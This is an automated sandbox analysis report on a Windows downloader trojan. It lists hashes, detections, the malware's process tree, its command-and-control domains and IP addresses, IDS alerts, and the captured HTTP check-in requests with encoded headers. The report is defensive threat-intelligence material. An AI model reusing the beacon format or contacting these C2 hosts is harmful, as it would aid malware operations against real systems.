Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cnzWgjUhS2.exe

Overview

General Information

Sample name:cnzWgjUhS2.exe
renamed because original name is a hash value
Original sample name:Trojan.Danger.ATA_virussign.com_10b089f41384787f77a9de73a9c55e4b.exe
Analysis ID:1506967
MD5:10b089f41384787f77a9de73a9c55e4b
SHA1:b5cd02bedf0c963c95b17937f334b4eb950a22ed
SHA256:ce28f0ea14877935233268bb240e0aa2013eb133a179fee671144939539fdc7a
Infos:

Detection

Neconyd
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Neconyd
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cnzWgjUhS2.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\cnzWgjUhS2.exe" MD5: 10B089F41384787F77A9DE73A9C55E4B)
    • omsecor.exe (PID: 6644 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: BA4DF80E161C9C58860725AAC02D99E4)
      • omsecor.exe (PID: 3868 cmdline: C:\Windows\System32\omsecor.exe MD5: 9AF480E9873460DD811C495A948A78AE)
        • omsecor.exe (PID: 564 cmdline: C:\Windows\SysWOW64\omsecor.exe /nomove MD5: 9AF480E9873460DD811C495A948A78AE)
  • cleanup
{"C2 url": ["http://ow5dirasuek.com/", "http://lousta.net/", "http://mkkuei4kdsz.com/"]}
SourceRuleDescriptionAuthorStrings
Process Memory Space: cnzWgjUhS2.exe PID: 6600JoeSecurity_NeconydYara detected NeconydJoe Security
    Process Memory Space: omsecor.exe PID: 6644JoeSecurity_NeconydYara detected NeconydJoe Security
      Process Memory Space: omsecor.exe PID: 3868JoeSecurity_NeconydYara detected NeconydJoe Security
        Process Memory Space: omsecor.exe PID: 564JoeSecurity_NeconydYara detected NeconydJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-08T06:09:37.868813+020020169981A Network Trojan was detected192.168.2.449730193.166.255.17180TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-08T06:10:01.919142+020020181411A Network Trojan was detected52.34.198.22980192.168.2.449739TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-08T06:10:01.919142+020020377711A Network Trojan was detected52.34.198.22980192.168.2.449739TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-08T06:09:37.850228+020020157861Malware Command and Control Activity Detected192.168.2.449749193.166.255.17180TCP
          2024-09-08T06:09:38.569119+020020157861Malware Command and Control Activity Detected192.168.2.449730193.166.255.17180TCP
          2024-09-08T06:10:00.064197+020020157861Malware Command and Control Activity Detected192.168.2.449731193.166.255.17180TCP
          2024-09-08T06:10:00.848191+020020157861Malware Command and Control Activity Detected192.168.2.44973864.225.91.7380TCP
          2024-09-08T06:10:01.919056+020020157861Malware Command and Control Activity Detected192.168.2.44973952.34.198.22980TCP
          2024-09-08T06:10:23.623919+020020157861Malware Command and Control Activity Detected192.168.2.449740193.166.255.17180TCP
          2024-09-08T06:10:45.111484+020020157861Malware Command and Control Activity Detected192.168.2.449741193.166.255.17180TCP
          2024-09-08T06:10:45.834962+020020157861Malware Command and Control Activity Detected192.168.2.44974364.225.91.7380TCP
          2024-09-08T06:10:46.699343+020020157861Malware Command and Control Activity Detected192.168.2.44974452.34.198.22980TCP
          2024-09-08T06:11:08.188034+020020157861Malware Command and Control Activity Detected192.168.2.449745193.166.255.17180TCP
          2024-09-08T06:11:29.708209+020020157861Malware Command and Control Activity Detected192.168.2.449746193.166.255.17180TCP
          2024-09-08T06:11:30.431154+020020157861Malware Command and Control Activity Detected192.168.2.44974764.225.91.7380TCP
          2024-09-08T06:11:31.264187+020020157861Malware Command and Control Activity Detected192.168.2.44974852.34.198.22980TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: cnzWgjUhS2.exeAvira: detected
          Source: http://lousta.net/161/343.htmlAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/Avira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/100/325.html)LAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/968/405.htmlAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/179/569.html;Avira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/100/325.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/161/343.htmllAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/130/71.htmlcrosoftAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/179/569.htmlQZAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/179/569.html3Avira URL Cloud: Label: phishing
          Source: http://lousta.net/895/196.html#Avira URL Cloud: Label: phishing
          Source: http://lousta.net/601/938.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/347/423.htmlt?E&Avira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/yAvira URL Cloud: Label: phishing
          Source: http://lousta.net/895/196.htmlAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/968/405.htmlzAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/968/405.htmlpAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/130/71.htmlr&&Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/179/569.htmliZ#Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/179/569.htmleZAvira URL Cloud: Label: phishing
          Source: http://lousta.net/303/619.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/976/76.htmlAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/968/405.html(Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/968/405.html$Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/968/405.htmlP&Avira URL Cloud: Label: phishing
          Source: http://lousta.net/303/619.html=Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/968/405.html&Avira URL Cloud: Label: phishing
          Source: http://lousta.net/467/386.htmlQ=Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/59/409.htmlk7Avira URL Cloud: Label: phishing
          Source: http://lousta.net/161/343.html=Avira URL Cloud: Label: phishing
          Source: http://lousta.net/976/76.htmlmswsock.dll.muiAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/179/569.htmliAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/130/71.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/347/423.html(Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/59/409.htmlAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/88/221.htmlVAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/179/569.htmlGUAvira URL Cloud: Label: phishing
          Source: http://lousta.net/Avira URL Cloud: Label: phishing
          Source: http://lousta.net/&XAvira URL Cloud: Label: phishing
          Source: http://lousta.net/347/423.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/895/196.html_Avira URL Cloud: Label: phishing
          Source: http://lousta.net/303/619.htmlEcAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/179/569.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/467/386.htmlAvira URL Cloud: Label: phishing
          Source: http://lousta.net/161/343.htmleAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodconAvira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/100/325.html7Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/968/405.html;Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/179/569.htmloZAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/59/409.html(&Z&Avira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/968/405.htmlasuek.com5Avira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/en-GBAvira URL Cloud: Label: phishing
          Source: http://lousta.net/161/343.htmlTAvira URL Cloud: Label: phishing
          Source: http://lousta.net/601/938.htmlshqos.dll.muiAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/Avira URL Cloud: Label: phishing
          Source: http://mkkuei4kdsz.com/88/221.htmlAvira URL Cloud: Label: phishing
          Source: http://ow5dirasuek.com/968/405.htmlNAvira URL Cloud: Label: phishing
          Source: C:\Windows\SysWOW64\omsecor.exeAvira: detection malicious, Label: TR/Downloader.Gen
          Source: C:\Users\user\AppData\Roaming\omsecor.exeAvira: detection malicious, Label: TR/Downloader.Gen
          Source: 5.2.omsecor.exe.400000.0.unpackMalware Configuration Extractor: Neconyd {"C2 url": ["http://ow5dirasuek.com/", "http://lousta.net/", "http://mkkuei4kdsz.com/"]}
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: C:\Windows\SysWOW64\omsecor.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\omsecor.exeJoe Sandbox ML: detected
          Source: cnzWgjUhS2.exeJoe Sandbox ML: detected
          Source: cnzWgjUhS2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_0040ABD9 FindFirstFileW,FindClose,0_2_0040ABD9
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00408248
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040ABD9 FindFirstFileW,FindClose,5_2_0040ABD9
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,5_2_00408248

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.4:49730 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49731 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49739 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49738 -> 64.225.91.73:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49730 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.4:49739
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49747 -> 64.225.91.73:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49744 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.4:49739
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49743 -> 64.225.91.73:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49748 -> 52.34.198.229:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49741 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49745 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49740 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49746 -> 193.166.255.171:80
          Source: Network trafficSuricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.4:49749 -> 193.166.255.171:80
          Source: Malware configuration extractorURLs: http://ow5dirasuek.com/
          Source: Malware configuration extractorURLs: http://lousta.net/
          Source: Malware configuration extractorURLs: http://mkkuei4kdsz.com/
          Source: global trafficHTTP traffic detected: GET /303/619.html HTTP/1.1From: 133702421766157995Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /895/196.html HTTP/1.1From: 133702421766157995Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /100/325.html HTTP/1.1From: 133702421766157995Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /179/569.html HTTP/1.1From: 133702421766157995Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0Host: ow5dirasuek.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /467/386.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /976/76.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /130/71.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /59/409.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=8.46.123.33; btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768601|1725768601|0|1|0
          Source: global trafficHTTP traffic detected: GET /347/423.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /601/938.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /88/221.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /968/405.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=8.46.123.33; btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768646|1725768601|22|2|0
          Source: global trafficHTTP traffic detected: GET /161/343.html HTTP/1.1From: 133702422009751771Via: opfcsi{>;56bttA;346_ojzA97f89j88f55=96ghd9h:;;g:71863i63Host: lousta.netConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 64.225.91.73 64.225.91.73
          Source: Joe Sandbox ViewIP Address: 193.166.255.171 193.166.255.171
          Source: Joe Sandbox ViewIP Address: 52.34.198.229 52.34.198.229
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: FUNETASFI FUNETASFI
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_00407036 Sleep,DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,0_2_00407036
          Source: global trafficHTTP traffic detected: GET /303/619.html HTTP/1.1From: 133702421766157995Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /895/196.html HTTP/1.1From: 133702421766157995Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /100/325.html HTTP/1.1From: 133702421766157995Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /179/569.html HTTP/1.1From: 133702421766157995Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</4a.6e.5a+28/3b^a4^761d5-.3,0d,0Host: ow5dirasuek.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /467/386.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /976/76.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /130/71.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /59/409.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=8.46.123.33; btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768601|1725768601|0|1|0
          Source: global trafficHTTP traffic detected: GET /347/423.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /601/938.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: lousta.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /88/221.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: mkkuei4kdsz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /968/405.html HTTP/1.1From: 133702422009751771Via: hprkjvr_vjwA<19cdsifA:_tfser>6514546cpwB7652bpf}B5:g4<k4;g18>59hdg:d=<7j;34926j26Host: ow5dirasuek.comConnection: Keep-AliveCookie: snkz=8.46.123.33; btst=96b9553d4f1c07b4ccb89e66c39fa5d4|8.46.123.33|1725768646|1725768601|22|2|0
          Source: global trafficHTTP traffic detected: GET /161/343.html HTTP/1.1From: 133702422009751771Via: opfcsi{>;56bttA;346_ojzA97f89j88f55=96ghd9h:;;g:71863i63Host: lousta.netConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: lousta.net
          Source: global trafficDNS traffic detected: DNS query: mkkuei4kdsz.com
          Source: global trafficDNS traffic detected: DNS query: ow5dirasuek.com
          Source: cnzWgjUhS2.exe, omsecor.exe, omsecor.exe, 00000008.00000002.2986204609.0000000000195000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/
          Source: omsecor.exe, 00000008.00000002.2986475132.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/&X
          Source: omsecor.exe, 00000008.00000002.2986475132.000000000059E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.2986204609.0000000000195000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.2986475132.000000000059A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/161/343.html
          Source: omsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/161/343.html=
          Source: omsecor.exe, 00000008.00000002.2986475132.000000000059A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/161/343.htmlT
          Source: omsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/161/343.htmle
          Source: omsecor.exe, 00000008.00000002.2986475132.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/161/343.htmll
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000060E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/303/619.html
          Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/303/619.html=
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/303/619.htmlEc
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/347/423.html
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/347/423.html(
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/347/423.htmlt?E&
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/467/386.html
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/467/386.htmlQ=
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/601/938.html
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/601/938.htmlshqos.dll.mui
          Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/895/196.html#
          Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/895/196.html_
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/976/76.html
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/976/76.htmlmswsock.dll.mui
          Source: omsecor.exe, omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/100/325.html
          Source: omsecor.exe, 00000001.00000002.1987110192.0000000000628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/100/325.html)L
          Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/100/325.html7
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/130/71.html
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/130/71.htmlcrosoft
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/130/71.htmlr&&
          Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/88/221.html
          Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/88/221.htmlV
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/en-GB
          Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/y
          Source: omsecor.exe, omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/179/569.html
          Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/179/569.html3
          Source: omsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/179/569.html;
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/179/569.htmlGU
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/179/569.htmlQZ
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/179/569.htmleZ
          Source: omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/179/569.htmli
